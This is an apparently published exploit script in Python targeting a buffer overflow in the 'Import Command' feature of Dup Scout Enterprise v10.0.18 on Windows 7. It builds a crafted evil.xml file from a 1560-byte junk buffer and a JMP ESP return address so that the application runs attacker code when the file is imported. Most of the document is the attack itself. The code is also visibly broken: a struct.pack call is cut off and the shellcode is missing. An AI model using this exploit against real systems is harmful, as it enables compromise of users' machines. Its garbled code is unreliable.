#!/usr/bin/python #======================================================================================================================== # Exploit Author: Touhid M.Shaikh # Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer Overflow # Date: 29-09-2017 # Website: www.touhidshaikh.com # Contact: https://github.com/touhidshaikh # Vulnerable Software: Dup Scout Enterprise v10.0.18 # Vendor Homepage: http://www.dupscout.com # Version: v10.0.18 # Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe # Tested On: Windows 7 x86 # # # To reproduce the exploit: # 1. right Click, click on Import Command # 2. select evil.xml , Booom Calc POPED up.. ;) #======================================================================================================================== import os,struct #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('' f = open('evil.xml', 'w') f.write(file) f.close()